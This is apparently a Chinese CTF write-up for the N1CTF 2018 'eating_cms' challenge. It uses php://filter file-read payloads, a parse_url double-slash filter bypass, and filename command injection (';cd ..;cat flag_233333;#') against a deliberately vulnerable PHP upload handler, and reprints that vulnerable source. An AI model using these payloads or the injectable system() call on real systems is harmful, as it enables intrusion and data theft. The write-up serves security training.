[N1CTF 2018]eating_cms

[N1CTF 2018]eating_cms

直接登录是不能登陆的，f12也没发现什么。dirsearch扫描一下发现了register.php

进入register.php查看

发现url发生了变化：

看这个样子像是伪协议，尝试一下读取源码，payload：/user.php?=php://filter/convert.base64-encode/resource=user，得到base64加密字符串，解密即得源码

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){Header("Location: index.php");}
if($_SESSION['isadmin'] === '1'){$oper_you_can_do = $OPERATE_admin;
}else{$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){if(!isset($_GET['page']) || $_GET['page'] === ''){$page = 'info';}else {$page = $_GET['page'];}
}
else{if(!isset($_GET['page'])|| $_GET['page'] === ''){$page = 'guest';}else {$page = $_GET['page'];if($page === 'info'){
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");Header("Location: user.php?page=guest");}}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

好像没什么有用的，只是发现了function.php，继续用伪协议查看一下，payload：/user.php?page=php://filter/convert.base64-encode/resource=function

<?php
session_start();
require_once "config.php";
function Hacker()
{Header("Location: hacker.php");die();
}function filter_directory()
{$keywords = ["flag","manage","ffffllllaaaaggg"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords = ["flag","manage","ffffllllaaaaggg","info"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";for ($i = 0; $i < strlen($string); $i++) {if (strpos("$whitelist", $string[$i]) === false) {Hacker();}}if (preg_match("/$blacklist/is", $string)) {Hacker();}if (is_string($string)) {return $mysqli->real_escape_string($string);} else {return "";}
}function sql_query($sql_query)
{global $mysqli;$res = $mysqli->query($sql_query);return $res;
}function login($user, $pass)
{$user = Filter($user);$pass = md5($pass);$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();if ($res->num_rows) {$data = $res->fetch_array();$_SESSION['user'] = $data[username_which_you_do_not_know];$_SESSION['login'] = 1;$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);if ($res == 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user = Filter($user);$pass = md5($pass);$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";$res = sql_query($sql);return $mysqli->insert_id;
}function logout()
{session_destroy();Header("Location: index.php");
}?>

发现了ffffllllaaaaggg，但是当尝试用伪协议读取ffffllllaaaaggg的时候出现了问题，payload：/user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

网页url变成了hacker.php，系统检测到了我们

返回代码部分，再次审计发现了parse_url，parse_url解析漏洞，绕过：通过在user.php前面再添加一个/，这种情况下会解析错误，返回false，然后就可以读到这个文件了，重新构造payload：//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}else {echo "you can find sth in m4aaannngggeee";
}
?>

发现了m4aaannngggeee，继续使用伪协议查看m4aaannngggeee，payload：/user.php?page=php://filter/convert.base64-encode/resource=m4aaannngggeee

<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}
include "templates/upload.html";?>

发现了templates/upload.html，进入该页面（payload：/templates/upload.html）

建立一个空的1.php上传发现显示错误，但是显示了upllloadddd.php

使用伪协议查看一下upllloadddd.php，payload：/user.php?page=php://filter/convert.base64-encode/resource=upllloadddd

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){die("error:can not move");}
}else{die("error:not an upload file！");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){unlink($newfile);die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){unlink($newfile);
}
?>

发现$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");，可以在filename处实行命令注入，但是我们需要找到真正的上传页面，而真正的上传页面在前面所给的m4aaannngggeee中，payload：/user.php?page=m4aaannngggeee

然后抓包，查看有什么，payload：;ls;#

使用cd ..（不能使用/，/被过滤了）切换到根目录下，payload：;cd ..;ls;#

发现了flag_233333，查看一下，payload：;cd ..;cat flag_233333;#

至此结束，撒花